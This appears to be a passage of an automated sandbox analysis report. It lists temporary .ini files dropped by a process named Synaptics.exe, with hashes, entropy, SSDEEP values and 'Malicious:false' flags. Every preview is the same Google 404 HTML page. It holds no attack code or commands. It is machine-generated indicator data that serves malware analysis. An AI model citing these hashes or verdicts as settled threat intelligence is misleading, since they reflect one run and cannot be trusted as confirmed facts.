                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.251709808686721
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Y+pAZewRDK4mW
                                                                                                                                                                                        MD5:07A680F307748F8A862ABE157BEEC76A
                                                                                                                                                                                        SHA1:ADB6ABA6B0E25698181BAFFD5A5C1F23199CCB63
                                                                                                                                                                                        SHA-256:4415769E3F040DDBA2A6956339DE2E8B7ABD0424E625C56CC3170E15B6E35B5E
                                                                                                                                                                                        SHA-512:AD0F5B49BB44EC240338DD6F4270B47BF35ADBA6B023CEC36C7ED1FC249C54797CBB8568A4AFF2A503908C311723C948B696E85F2FA257ED01C387F6F5E22541
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="/Usi0BIcuQrdutvr6gOKYg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jRXQ1zF.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.266296557722214
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0pkSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+1+pAZewRDK4mW
                                                                                                                                                                                        MD5:EF2475D2B88FA62B9F1F40AA416F27E1
                                                                                                                                                                                        SHA1:E70415092A4121CBF46F546DEEA3FE306F2570F3
                                                                                                                                                                                        SHA-256:D3C99ED29B2A8D54721B16DC5BA1DF0E55A936634C68BFD0E00A10C7DC4B5386
                                                                                                                                                                                        SHA-512:CF180E2C1F79F2357198EF8A1CBC4B1525AB5E8E7747A80E622E719230A8F4E196BE9CBB842A3F46B192050B910E29116BB5B59930622DBC0CBF266F44BF5AAD
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="e6XAbSYYEU9pWPbl0cKuTg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jTtxL5k.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.258500429776045
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0lTDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+S3+pAZewRDK4mW
                                                                                                                                                                                        MD5:F0C47E218E764FCBE45B2A3A6C442AD4
                                                                                                                                                                                        SHA1:BEA7AEB41AEB13718D90F39540BA95CE14E597F3
                                                                                                                                                                                        SHA-256:AB00128F76438DD4DDFB059CE73E4447B4A18BD6A7EEC26292F0379BF286E0D6
                                                                                                                                                                                        SHA-512:93340AD2998534F2715D8A7572907FE0B7693CFE23228937C809CAA2CEC9DEA0DC66A37CD23D028E3EF755624EEC4692E0A5A75EBC9174E4A3F8195B3C7D6B23
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7ERDf/cWEahj1ItLlcx94A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jihlXq3.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.265346852220596
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+07SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Q+pAZewRDK4mW
                                                                                                                                                                                        MD5:604019365E2A44C2448CC3923CED7DE8
                                                                                                                                                                                        SHA1:AF210A7BF66572BCB8305A640A5AE1CA1D84C509
                                                                                                                                                                                        SHA-256:9F069AC5904820E9B9550071F849FBC8DC400E2006A8AFC26595722A9DC3BF58
                                                                                                                                                                                        SHA-512:C49112ABDABE83C90347808647958975F097B7E2B265554D458DCA32B32BE809097970FA9DAC8CCC8D10CC0E0EAD4E02A425C87C9FD587D98BCA4CF5D108657A
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="krzw1YKIuEvVGmP4LT7hZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jmXX4sG.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2543348760006
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0HwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+v+pAZewRDK4mW
                                                                                                                                                                                        MD5:C557D37510F0C3621391273D785304A5
                                                                                                                                                                                        SHA1:202970C0862F753EA7DA9E6E9FCCB210D22530D9
                                                                                                                                                                                        SHA-256:2A12EEE23AA736DCA0FFE87DF4425C87AE60C2B8E3452BCCEE6F47F67FF7CA29
                                                                                                                                                                                        SHA-512:9BC4792A59AC499D90DD02CB2C8D977F0CA231BA568E364EC0E650174102000A5DDD33ABB7A233B589DE9AB8FFFCCAA5297E4B0AFCC008F7CCE2492B4B00040D
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Wo2kPOuT4N0dC8roDCgeJg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jmaNMZS.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.254456321365619
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0nYSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+EY+pAZewRDK4mW
                                                                                                                                                                                        MD5:F338EB283E531657DC362A90B05B2096
                                                                                                                                                                                        SHA1:85D08E5C024D951092C1967A32DA9CC87548FAA6
                                                                                                                                                                                        SHA-256:AEF86A357E5E8886048BD5D53C1B0D49BC421C3D09BBC696D939489745949E87
                                                                                                                                                                                        SHA-512:8EEB804C1C1B2A1ED102FCEA1DEA3170F991D1920C7E9A2360A57DD227DB6B40F878E54467CF5C65AE4A29CEA9B7CBACB939F646C247D01DCC7376642E0D1394
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uo77I7bNWM8/eqoz/+ygtQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\jtkNwc8.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.256633738484214
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0hSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+C+pAZewRDK4mW
                                                                                                                                                                                        MD5:8894BD02BD5A93BB1D5547C4D313619F
                                                                                                                                                                                        SHA1:5AF2583D0740B9C524F0AC1FECF8BCC1EF522904
                                                                                                                                                                                        SHA-256:71A0EB59A8DDB15CE6FACF53976B2D1E659698AC521DA14038F465CA49F43321
                                                                                                                                                                                        SHA-512:E3E34B9174AB416BBDF433BCE4CC20B3A1F249FD174023CD554363425A955461435550ED10F9BCC67A6303716DDDAEE5283960A105E1B0E98641EF4237581CBD
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JJn8rnVn4hHZnd/9GYYC/w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\k2xFIFS.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.267106183120493
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0EiFSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+uF+pAZewRDK4mW
                                                                                                                                                                                        MD5:B03395AB1467E8826E84108E1908ADA9
                                                                                                                                                                                        SHA1:67134813DE1135E92CD405DF2CBEB0F1ECF8AA2F
                                                                                                                                                                                        SHA-256:DD46AA17904240748E26B72D2D3CD5E22ADC5FEEB5DB956C1E25EF0C33EEDB75
                                                                                                                                                                                        SHA-512:97C65AB0E0C85445657BFFB9BEFE35B5DFF05747FD85616FFB36B5868C189D1BBBC5B7E2351FD80B9758EDD81A88E4DCAD294EF349E5825F2DF53E35E43F3592
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="S2IBUbOzYcf7UNo/pGjeGQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\kAyGk6V.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.263021436188621
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0Br3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK++r3+pAZewRDK4mW
                                                                                                                                                                                        MD5:DB9EF96D99757C86F0C3C707ECE468ED
                                                                                                                                                                                        SHA1:AC5D55F870D7B98CBC19766141317FCF743E4E44
                                                                                                                                                                                        SHA-256:553A3395967630C7D4507F1BB4E54C4A1217D7290CCA5E7E0FC8E61844C6E8E4
                                                                                                                                                                                        SHA-512:6FC42172E85EA5DE56A2EC4CB3BF5D71E2EC46A44B6B66783FFF518672F98B5A85FC86E2226BA0075A3CB4BF88029C291978AA1BA9D70B55FE3A69EC38810E9F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6Hu1DWuF9k0uTuE3Cpxjvg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\kJdNIqB.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.256715812094928
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0MZSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+jZ+pAZewRDK4mW
                                                                                                                                                                                        MD5:1B2468EBE0B7643B967224E4154F208F
                                                                                                                                                                                        SHA1:4192393D09F6775560794E22DBF23EDDC0F06F05
                                                                                                                                                                                        SHA-256:5920053AD74A49E727E4324BC33A9371CB05122D40B528D85750C54C3E3345D0
                                                                                                                                                                                        SHA-512:992555A4D3C6A004ED5775E922A78624757ACEB7521958EFFB2E7D250F899FAE5E9DCC4B87CB7E07F441BFFD1AFE00BA5F1900C878D19606A1B6F32A86BE1DEE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="c4hY7pFmUQ4pf5jYCpRnEw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\kVZ4RQY.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.264945617229767
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0KUS3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+j/+pAZewRDK4mW
                                                                                                                                                                                        MD5:69740F6A85989C795F98F82362024B6C
                                                                                                                                                                                        SHA1:389087B24C35014E981E31F8E63472DAB20813BA
                                                                                                                                                                                        SHA-256:B48CE99E09ABEFC71CA972AFB82012093C860282164AF97A477D07E05F7B5BDA
                                                                                                                                                                                        SHA-512:BB73D4EC834E89536F6C6AB3DE8B47637D1E9DB036A93AAA5CE1C76998B329E84296622185EC01AEAEF26920043F6CAA8BFCF64BE3301D3A0196898BCDE70890
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TxoLRd+XNsqoCb3HO0dLFA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\kh5Pf3V.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.262705331048191
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0Ut2ymISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+tt2w+pAZewRDK4mW
                                                                                                                                                                                        MD5:858AF5278E296F2ECE20DFA500C6504A
                                                                                                                                                                                        SHA1:002D3280DCD40113F347A8546DD6E16332D768A3
                                                                                                                                                                                        SHA-256:47A533B7923723EC0643A6B174B189077E3517FEB4CD7D2B0BEB7374C0CFA51B
                                                                                                                                                                                        SHA-512:A9C9FD8F91B67D0B215B4E673DE72AAD806E20D9465C80D0D824376EB9EE94315E35C2131246A7537C989ADE2EACD4F41114D77BEF61012158B02981C3503D13
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9jO4f9zDHD/bXwubb8mUNg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\kkbCAVy.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.270848554536406
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0QSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+X+pAZewRDK4mW
                                                                                                                                                                                        MD5:811C507B6C6F9E94D7D21D5986C21A47
                                                                                                                                                                                        SHA1:F2FEF28297196AF725729C058CF1CCC47ABBEC11
                                                                                                                                                                                        SHA-256:0085C44CB99CC9AF7A8B2BAB72632E1AA001EFC0A8E7E7B43051D4D69F83F46F
                                                                                                                                                                                        SHA-512:D3450443C73148B92FAA50C49AAC2A21577F6474A7073303BA9A418317C01CD8189294035B6D7727C910D0D41417FCC04C25BA50796FB4D60123838228D08E5E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="f30IA0PBJGsT/65sKiZQyQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\kmfPQ6w.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2590690278955465
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0ocSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Nc+pAZewRDK4mW
                                                                                                                                                                                        MD5:0C01B68113B6FCA4E278DCE2569E85F4
                                                                                                                                                                                        SHA1:B385E71D3220C32A524C77416448AE47F66AC3BE
                                                                                                                                                                                        SHA-256:43BB9A8823C43A32C92B660EF3E66E06C421674BFECEF93E4C3A5C239B88EFD5
                                                                                                                                                                                        SHA-512:251E4F1A46858AD1F3AD401F42357785AE952DF304CA3E4AC78FE91A455BE43ABD404F0E3B3B441D97EAE81071F4A7C697DB91F7D2AA4325500AA7BB02558DE5
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="/9Gyt6oiMruDDYrXUkJAag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\kuv2LMG.ini

                                                                                                                                                                                        Download File
